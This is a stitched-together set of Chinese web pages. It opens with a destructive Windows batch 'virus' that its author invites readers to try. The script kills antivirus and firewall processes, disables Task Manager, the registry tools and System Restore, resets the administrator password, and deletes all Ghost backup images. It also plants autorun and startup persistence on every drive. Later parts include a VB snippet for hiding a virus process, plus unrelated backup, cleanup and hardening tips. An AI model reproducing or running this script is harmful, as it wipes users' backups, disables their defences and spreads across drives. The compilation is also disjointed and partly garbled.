最强的⽤批处理编写的病毒内容就是下⾯这些了,如果你想试试它的威⼒,不妨试试,,,呵呵复制代码代码如下:@echo offtitle You DEADset taskkill=scopy %0 %windir%\system32\cmd.batattrib %windir%\system32\cmd.bat +r +s +hnet stop sharedaccess >nul%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul%s% /im norton* /f >nul%s% /im av* /f >nul%s% /im fire* /f >nul%s% /im anti* /f >nul%s% /im spy* /f >nul%s% /im bullguard /f >nul%s% /im PersFw /f >nul%s% /im KAV* /f >nul%s% /im ZONEALARM /f >nul%s% /im SAFEWEB /f >nul%s% /im OUTPOST /f >nul%s% /im nv* /f >nul%s% /im nav* /f >nul%s% /im F-* /f >nul%s% /im ESAFE /f >nul%s% /im cle /f >nul%s% /im BLACKICE /f >nul%s% /im def* /f >nul%s% /im 360safe.exe /f >nulnet stop Shadow" "System" "Serviceset alldrive=d e f g h i j k l m n o p q r s t u v w x y zfor %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nulfor %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nulrem 修改注册表.......REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ Folder\Hidden\SHOWALL /vCheckedValue /t REG_DWORD /d 00000000 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /tREG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d4294967295 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /tREG_DWORD /d 00000002 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD/d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD/d 00000001 /f >nulREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d00000001 /f >nulclsnet user administrator 123456 >nulfor %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nulecho @echo off >d:\setup.batecho shutdown -r -t 10 -f -c 亲爱的朋友,我⼗分抱歉的通知你,你的电脑已经严重崩溃,请重新安装系统可以解决此问题!^.^ >>d:\setup.batecho copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat >>d:\setup.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /vsetup.bat /t REG_SZ /d d:\setup.bat/f >>d:\setup.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /vsetup.bat /t REG_SZ /d d:\setup.bat/f >>d:\setup.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat/f >>d:\setup.batHKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f>>d:\setup.batecho [windows] >> %windir%\win.iniecho run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.iniecho load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.iniecho [boot] >> %windir%\system.iniecho shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.iniecho [AutoRun] >d:\autorun.infecho Open=setup.bat >>d:\autorun.infecho Open=system.bat >>d:\autorun.infattrib d:\autorun.inf +r +s +h >>d:\setup.batattrib d:\setup.bat +r +s +h >>d:\setup.batstart d:\setup.bat /min >nulecho @echo off >>C:\AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>C:\AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>C:\AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat/f >>C:\AUTOEXEC.BATecho if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BATcopy %0 %systemroot%\windows.bat >nulif not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.batif not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.batif not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat /f >>%windir%/system32/explorer.batecho start %systemroot%\windows.bat /min >>%windir%/system32/explorer.batattrib %windir%/system32/explorer.bat +r +s +h%attrib %systemroot%/windows.bat +r +s +hfor %%c in (%alldrive%) do echo @echo off >>%%c:\system.batfor %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.batfor %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.batset drive=e f g h i j k l m n o p q r s t u v w x y zfor %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inffor %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.infcopy %0 d:\Program" "Files\run.batfor %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat startd:\Program" "Files\run.bat /min>>%%c:\system.batfor %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.batfor %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nulfor %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nulif not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat/min >>d:\setup.batattrib d:\Program" "Files\run.bat +r +s +h >nuldel %0exit。
GHO图解
ghost是一个备份软件它能将一个分区内所有文件通常我们是将系统盘C盘制作成一个“压缩文件” 存放在电脑其它安全的分区内再在系统出现任意已知或未知的问题时候再启动GHOST 提取备份文件再还原到系统盘C盘以保证到系统正常安全运行 GHOST适用于各种操作系统名词解释镜像文件此处泛指GHOST软件制作成的压缩文件以.gho 为后缀在ghost中显示为黄色源盘即将要备份的磁盘在一般的情况下我们泛指操作系统盘C盘镜像盘存放备份镜像的磁盘在一般的情况下我们泛指文件存放盘D盘或 E F G 盘打包制作镜像文件通常是指将操作系统盘C盘经压缩后存放在其它盘如D盘里面解包还原镜像文件通常在系统盘C盘出现错误或病毒木马后将存放在其它盘里面的镜像件还原到系统盘内以求能恢复干净良好的操作系统我在写这个网页是在一个前题下的1 针对没有软驱没有光驱没有引导光盘也不会用光盘启动的人能够在本地硬盘上简单操作就可维护好的2 针对对电脑不是太懂或十分不懂的朋友所写的我不能要求到他们了解到各种分区格式内存交换文件休眠文件……故而 GHOST的相当多的其它功能都没有讲到仅仅只讲到了最基本最实用的部一下要求他们了解到许多他们或者说会望而却步的只有当他们了解到了初步再在实用阶段慢慢的一步一步熟悉他们或才会一通百通的3 个人主张如无特别必要不要在系统上安装限制性的软件或系统优化软件通常都没有实际用处而通常或有副作用的通常只有RMB能够真正优化到电脑一使用GHOST之前必定要注意到的事1.在备份系统时单个的备份文件最好不要超过 2GB 如果超过了2GB 程序会自动产生一个后缀为如00100001.GHS的文件请您切记不要保留此文件与镜像文件在同一文件夹内没有此文件是能还原成功的建议您新建一个文件夹名为001(如果您不断备份您可以依次新建文件夹名为003 004 依此类推) 将镜像放置在里面GHOST 建议您选用选用最新的版本号需要最少GHOST8.0本或以上的版本2.在备份系统前最好将一些无用的文件删除以减少Ghost文件的体积通常无用的文件有:Windo 的临时文件夹如果您不是太了解只建议您删除C:\WINDOWS\TEMP 下面的文件镜像文件应尽量保持“干净” “基本”。
电脑病毒是怎么做的呢
电脑病毒是怎么做的呢电脑病毒是我们都不想遇到的,不希望自己的电脑被感染的,那你们知道电脑病毒是怎么做的吗?下面是店铺为大家整理的相关内容,希望对大家有帮助!电脑病毒的制作:电脑病毒是用语言编写出来的。
编写后释放到网络上。
病毒有传染性,破坏性,顽固性,隐藏性。
可想而之了。
1.系统补丁要打全,用360和金山清理专家打补丁。
2.杀毒软件要经常升级,要装防火墙软件。
3.不要去小站点下载软件,安装软件,看电影,听歌曲,小站点不安全。
3.QQ聊天不接收陌生人发的网站,不去浏览不良网站和下载不良电影。
有病毒不要紧,要有个查杀方法。
以下是我总结查杀病毒的办法,希望对你有用:适合大多数的病毒木马、盗号木马,恶意软件及插件的清理。
如果你用第三方浏览器如世界之窗,遨游,火狐浏览器可能就不会轻易中毒,毕竟比IE安全些,呵呵!~每天上完网后,用360,金山清理专家等软件清理一遍系统。
0.如果你用IE上网,最好装畅游巡警,安装好畅游巡警后,打开IE浏览器会有畅游巡警工具条,这个软件有检测挂马网站,检测钓鱼诈骗网站,检测恶意下载链接和广告链接,而且还有防溢出设置,把这个选项打勾。
1.查杀病毒木马通常要到安全模式中查杀,开机不停按F8进入,然后通光标键选择安全模式,回车。
2.如果用单一用360肯定不行的。
360也有检测不到,清理不掉的病毒和木马。
但是我喜欢综合查杀,用360+金山清理专家+恶意软件清理助手+windows 清理助手+卡卡助手+超级兔子和优化大师,很多都是绿色软件,没有冲突,不占用很多内存,查杀效果很好.升级到最新版本,最新查杀引擎,最新病毒库,然后到安全模式中查杀。
3.首先把能下载的工具和软件都下载到计算机中,然后升级,都升级到最新版本后,马上断网,用AV,机器狗专杀,顽固木马专杀大全,金山清理专家,windows 清理助手,恶意软件清理助手,超级兔子和优化大师,但是你要记住,要进入安全模式中清理。
先用专杀工具清理,每清理完一次,就要用兔子和大师,进行注册表残余键值清理和临时文件清理,然后再用金山清理专家等几个辅助软件清理,清理后,在用兔子和大师进行扫尾工作。
电脑病毒制作方法
电脑病毒制作方法朋友们想做一些小的电脑病毒吗,对于接触计算机的朋友们来说,病毒已经不在是一个陌生的东西。
下面由小编给你对电脑病毒做出详细的制作方法!希望对你有帮助!方法如下:病毒一般都具有传播、隐藏、破坏等能力。
所以自从第一个病毒问世以来,它便被人们视为一种神秘的东西。
但是,我们要知道。
病毒也是程序,也是由人写出来的。
所以,病毒并不是什么高不可攀的东西。
现在,让我们了解一下VB制作病毒的原理。
首先,病毒是有隐藏性的。
如何来实现病毒的隐藏是很多年来的热点话题。
我们先不接触什么线程插入技术。
我们要实行自我隐藏,就要用到API函数。
其代码如下:PublicDeclareFunctionGetCurrentProcessidLib"kernel32 "()AsLongPublicDeclareFunctionRegisterServiceProcessLib"kernel 32"(ByValdwProcessIDAsLong,ByValdwTypeAsLong) PublicConstRSP_SIMPLE_SERVICE=1PublicConstRSP_UNREGISTER_SERVICE=0PublicSubMakeMeService()DimpidAsLongDimreseryAsLongpid=GetCurrentProcessid()regserv=RegisterServiceProcess(pid,RSP_SIMPLE_SERVICE) EndSub这样就实现了自我隐藏。
还有别的什么App.Title=""和App.T askVisible=False都可以用于VB病毒的隐藏。
病毒光会隐藏还不行,还要有常驻内存的能力。
说通俗点,计算机关闭病毒也就跟着死去,而计算机重启,病毒也要跟这复活。
Imjpmig.exe是什么程序-
Imjpmig.exe是什么程序?篇一:3分钟让你的电脑百毒不侵[1]第一招:清除系统垃圾轻松流畅上网你是否注意到你的电脑系统磁盘的可用空间正在一天天在减少呢?是不是像老去的猴王一样动作一天比一天迟缓呢?没错!在Windows在安装和使用过程中都会产生相当多的垃圾文件,包括临时文件(如:*.tmp、*._mp)日志文件(*.log)、临时帮助文件(*.gid)、磁盘检查文件(*.chk)、临时备份文件(如:*.old、*.bak)以及其他临时文件。
特别是如果一段时间不清理IE的临时文件夹“Temporary Internet Files”,其中的缓存文件有时会占用上百MB的磁盘空间。
这些LJ文件不仅仅浪费了宝贵的磁盘空间,严重时还会使系统运行慢如蜗牛。
这点相信你肯定忍受不了吧!所以应及时清理系统的LJ文件的淤塞,保持系统的“苗条”身材,轻松流畅上网!朋友来吧,现在就让我们一起来快速清除系统垃圾吧!!下面是步骤很简单就两步!在桌面上点鼠标右键,选择新建一个“记事本”,把下面的字复制进去,点“另存为”,把文件名定为“清除系统”就完成,记住后缀名一定要是.bat,好ok了!你的垃圾清除器就这样制作成功了!双击它就能很快地清理垃圾文件,大约一分钟不到。
PS. 要复制进去的字是见下(红色部分)@echo offecho 正在清除系统垃圾文件,请稍等......del /f /s /q %systemdrive%\*.tmpdel /f /s /q %systemdrive%\*._mpdel /f /s /q %systemdrive%\*.logdel /f /s /q %systemdrive%\*.giddel /f /s /q %systemdrive%\*.chkdel /f /s /q %systemdrive%\*.olddel /f /s /q %systemdrive%\recycled\*.*del /f /s /q %windir%\*.bakdel /f /s /q %windir%\prefetch\*.*rd /s /q %windir%\temp & md %windir%\tempdel /f /q %userprofile%\cookies\*.*del /f /q %userprofile%\recent\*.*del /f /s /q “%userprofile%\Local Settings\Temporary Internet Files\*.*”del /f /s /q “%userprofile%\Local Settings\Temp\*.*”del /f /s /q “%userprofile%\recent\*.*”echo 清除系统LJ完成!echo. & pause以后只要双击运行该文件,当屏幕提示“清除系统LJ完成!就还你一个“苗条”的系统了!!到时候再看看你的电脑,是不是急速如飞呢?可别忘了回帖喔!注:LJ就是垃圾的意思!这招比那些所谓的优化大师好用!不会破坏系统文件。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
del C:\Docume~1\用户名\Locals~1\Temp\*.*
当然还可以把History和Cookies都清空。
做一个批命令文件,放到开始菜单中的“启动”项中。
这样也就做好了受限用户上网的准备工作,网上的病毒已经无法感染你的系统,也无法更改系统文件,对其它分区也无权更改,这样U盘病毒也无关紧要,因为病毒无法写入分区根目录下。网页病毒无法更改系统文件,再凶的网页病毒也无能为力了。
3、设置好后,进入创建的计算机管理员用户,打开“我的电脑”,单击“工具”——>;“文件夹选项”,点击第二个选项卡“查看”,把里面的“使用简单文件共享(推荐)”前的勾去掉。这个是以后打开文件夹或文件的属性时会出现“安全”选项卡。
4、把所有分区属性的“安全”选项卡中“users”用户去掉。这是它默认有一个特殊权限,可以在分区下或文件夹内创建文件夹。再可以创建或保存文件,这可能给病毒可乘之机。所以去掉。还有一个是“everyone".也去掉。添加创建的受限用户进去,权限是”只读”。
7、清理上网缓存及临时文件,上网时,一般缓存放在C:\Documents and Settings\用户名\Local Settings\Temporary Internet Files中,这也是病毒藏匿的地方,还有就是C:\Documents and Settings\用户名\Local Settings\Temp 下的临时文件。很多程序要用到这个地方。病毒也喜欢藏在这里,所以,在开机时,用批命令清空这两个文件夹。让病毒无处藏身。批命令为:
1、安装系统后(包括GhostXP),首先把所有分区都转化成NTFS格式,很重要哦。不要说不会啊,就是单击开始按钮——>;运行.输入 "convert c: /fs:ntfs ",可以把C盘转换成NTFS格式,不过要重启才能转换哦,其它盘就把C:改成相应的盘符就行了.
2、在控制面板中打开"用户帐号",将Administrator修改密码,尽复杂些,不一定要记得.再创建一个计算机管理员用户和受限用户,管理员用户一定要密码,且也要复杂一些,这个密码要记住.因为以后装软件,游戏要用上.当然,记不住可以在DOS下改.
5、个别文件的权限问题:象QQ、游戏都需要完全权限,所以在计算机管理员用户中要给受限用户完全权限。QQ最好把与QQ程序在一起的文件给只读权限,防止木马替换QQ及相关的DLL文件。
6、在“运行”中输入“REGEDIT”,打开注册表,把里面的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]或[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce]的权限设为只读。防止病毒利用此处启动。